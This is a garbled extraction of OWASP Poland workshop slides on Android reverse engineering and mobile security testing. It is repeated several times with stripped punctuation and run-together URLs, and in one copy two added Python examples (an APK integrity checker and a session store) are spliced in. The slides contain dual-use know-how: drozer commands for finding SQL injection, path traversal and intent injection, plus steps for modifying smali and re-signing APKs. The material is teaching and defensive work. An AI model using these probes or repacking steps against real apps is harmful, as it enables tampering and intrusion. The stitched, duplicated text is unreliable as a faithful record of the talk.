id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Lets you use any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but produce different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
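As an added example (not part of the workshop material), the script below walks the anatomy of an APK that the slides describe: it lists the zip entries, parses the classes.dex header and checks its built-in adler32 checksum and SHA-1 signature, and recomputes the per-entry digests recorded in META-INF/MANIFEST.MF by the v1 (JAR) signing scheme, so a classes.dex that was modified and repacked without re-signing shows up. The APK and DEX bytes are constructed in memory (no classes, placeholder CERT.SF/CERT.RSA) so it runs offline; pass a real file's bytes to inspect_apk() to use it on an actual package.

```python
"""Anatomy of an APK: zip entries, DEX header integrity, and v1 manifest digests.

Added example, not from the workshop slides. The APK below is a constructed
fixture so the script runs offline.
"""
import base64
import hashlib
import io
import struct
import zipfile
import zlib

DEX_MAGIC = b"dex\n035\0"   # DEX format version 035, what dex2jar and apktool consume
DEX_HEADER_SIZE = 0x70


def parse_dex_header(dex: bytes) -> dict:
    """Parse the fixed 0x70-byte DEX header and check its two integrity fields.

    Layout (little-endian): magic[8], adler32 checksum u32, SHA-1 signature[20],
    file_size u32, header_size u32, endian_tag u32, then section sizes/offsets.
    The checksum covers every byte after itself (offset 12 onward); the SHA-1
    covers every byte after itself (offset 32 onward). A corrupted or hand-edited
    classes.dex that was not rebuilt by a proper tool fails one or both checks.
    """
    if len(dex) < DEX_HEADER_SIZE or dex[:8] != DEX_MAGIC:
        raise ValueError("not a DEX 035 file")
    (checksum,) = struct.unpack_from("<I", dex, 8)
    signature = dex[12:32]
    file_size, header_size, endian_tag = struct.unpack_from("<III", dex, 32)
    return {
        "file_size": file_size,
        "header_size": header_size,
        "little_endian": endian_tag == 0x12345678,
        "size_ok": file_size == len(dex),
        "checksum_ok": checksum == (zlib.adler32(dex[12:]) & 0xFFFFFFFF),
        "signature_ok": signature == hashlib.sha1(dex[32:]).digest(),
    }


def parse_manifest(mf: str) -> dict:
    """Map entry name -> base64 SHA-256 digest from META-INF/MANIFEST.MF.

    Only the one-line form is handled; real manifests may wrap long names over
    continuation lines that start with a space.
    """
    digests, name = {}, None
    for line in mf.splitlines():
        if line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA-256-Digest: ") and name:
            digests[name] = line[len("SHA-256-Digest: "):]
    return digests


def inspect_apk(data: bytes) -> dict:
    """List entries, validate classes.dex and recompute the manifest digests."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        dex = parse_dex_header(z.read("classes.dex"))
        digests = parse_manifest(z.read("META-INF/MANIFEST.MF").decode())
        mismatch = [n for n, d in digests.items()
                    if base64.b64encode(hashlib.sha256(z.read(n)).digest()).decode() != d]
        uncovered = [n for n in names if n not in digests and not n.startswith("META-INF/")]
    return {"entries": names, "dex": dex, "digest_mismatch": mismatch, "uncovered_entries": uncovered}


def build_dex(body: bytes = b"\0" * 32) -> bytes:
    """Constructed fixture: a DEX image with a correct header and no classes."""
    size = DEX_HEADER_SIZE + len(body)
    tail = struct.pack("<III", size, DEX_HEADER_SIZE, 0x12345678)
    tail += b"\0" * (DEX_HEADER_SIZE - 44) + body          # remaining header fields zeroed
    sig = hashlib.sha1(tail).digest()
    cks = zlib.adler32(sig + tail) & 0xFFFFFFFF
    return DEX_MAGIC + struct.pack("<I", cks) + sig + tail


def build_apk(dex: bytes) -> bytes:
    """Constructed fixture: minimal APK entry set with a v1 manifest (CERT.* are placeholders)."""
    files = {"AndroidManifest.xml": b"<manifest/>", "classes.dex": dex, "resources.arsc": b"\x02\x00\x0c\x00"}
    mf = "Manifest-Version: 1.0\r\n\r\n" + "".join(
        f"Name: {n}\r\nSHA-256-Digest: {base64.b64encode(hashlib.sha256(c).digest()).decode()}\r\n\r\n"
        for n, c in files.items())
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for n, c in files.items():
            z.writestr(n, c)
        z.writestr("META-INF/MANIFEST.MF", mf)
        z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\r\n")
        z.writestr("META-INF/CERT.RSA", b"")
    return buf.getvalue()


def replace_entry(apk: bytes, name: str, content: bytes) -> bytes:
    """Rewrite one entry and leave META-INF untouched: a repacked APK that was not re-signed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk)) as src, zipfile.ZipFile(buf, "w") as dst:
        for item in src.infolist():
            dst.writestr(item.filename, content if item.filename == name else src.read(item.filename))
    return buf.getvalue()


if __name__ == "__main__":
    apk = build_apk(build_dex())
    print(inspect_apk(apk))
    print("repacked:", inspect_apk(replace_entry(apk, "classes.dex", build_dex(b"\x01" * 32)))["digest_mismatch"])
```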
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify:
  – whether a session expires (copy a cookie and try to use it after 30 minutes)
  – whether a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
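As an added example (not part of the workshop material), the server-side session store below implements the mitigations listed above and then replays the three checks from the "how to find" slide against itself: reuse of a copied token after 30 minutes of inactivity, survival of the old token across an authentication state change, and token guessability. Tokens come from the OS CSPRNG via the standard library's secrets module and are stored only as SHA-256 hashes; the clock is passed in as a parameter (constructed epoch values) so the 30-minute and absolute timeouts can be exercised without waiting.

```python
"""Server-side session handling that passes the M9 checks from the slide.

Added example, not from the workshop. Time is injected as seconds since the
epoch so expiry can be tested deterministically.
"""
import hashlib
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

IDLE_TIMEOUT = 30 * 60        # 30 minutes of inactivity, the value the slide tests for
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap regardless of activity
TOKEN_BYTES = 32              # 256 bits from the OS CSPRNG


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


class SessionStore:
    """Sessions live only on the server, keyed by a hash of the bearer token.

    Storing the hash rather than the token means a leaked copy of the store
    does not yield tokens that can be replayed.
    """

    def __init__(self) -> None:
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def create(self, user: str, now: float) -> str:
        token = secrets.token_urlsafe(TOKEN_BYTES)
        self._sessions[self._key(token)] = Session(user, now, now)
        return token

    def _expired(self, s: Session, now: float) -> bool:
        return now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT

    def validate(self, token: str, now: float) -> Optional[str]:
        """Return the user for a live session, or None; expired sessions are destroyed on sight."""
        key = self._key(token)
        s = self._sessions.get(key)
        if s is None:
            return None
        if self._expired(s, now):
            del self._sessions[key]
            return None
        s.last_seen = now          # sliding idle window
        return s.user

    def invalidate(self, token: str) -> None:
        self._sessions.pop(self._key(token), None)

    def on_auth_change(self, old_token: str, new_user: str, now: float) -> str:
        """Any authentication state change (login, logout, user switch) destroys the
        old session and issues a fresh token, so the old one cannot be replayed."""
        self.invalidate(old_token)
        return self.create(new_user, now)

    def purge_expired(self, now: float) -> int:
        """Housekeeping for tokens that were never presented again; returns how many were dropped."""
        dead = [k for k, s in self._sessions.items() if self._expired(s, now)]
        for k in dead:
            del self._sessions[k]
        return len(dead)

    def live_count(self) -> int:
        return len(self._sessions)


def run_m9_checks(store: SessionStore) -> dict:
    """Replay the three slide checks; every flag is False for a correct store and
    the freshly issued token still works."""
    t0 = 1_700_000_000.0                                  # constructed clock value
    # 1. copy the cookie and try to use it again after 30 minutes
    alice = store.create("alice", t0)
    reuse_after_30min = store.validate(alice, t0 + IDLE_TIMEOUT + 1) is not None
    # 2. authentication state changes: the same client now logs in as bob
    alice_again = store.create("alice", t0)
    bob = store.on_auth_change(alice_again, "bob", t0 + 60)
    old_token_survives = store.validate(alice_again, t0 + 61) is not None
    # 3. guessability: two sessions for one user must never share a token, and the
    #    token must be long random material (a device ID used as token fails here)
    t1, t2 = store.create("carol", t0), store.create("carol", t0)
    predictable = t1 == t2 or len(t1) < 40
    return {
        "reuse_after_30min": reuse_after_30min,
        "old_token_survives_auth_change": old_token_survives,
        "predictable": predictable,
        "new_token_valid": store.validate(bob, t0 + 61) == "bob",
    }


if __name__ == "__main__":
    print(run_m9_checks(SessionStore()))
```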
Thank you
pawelrzepa@outlook.com
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
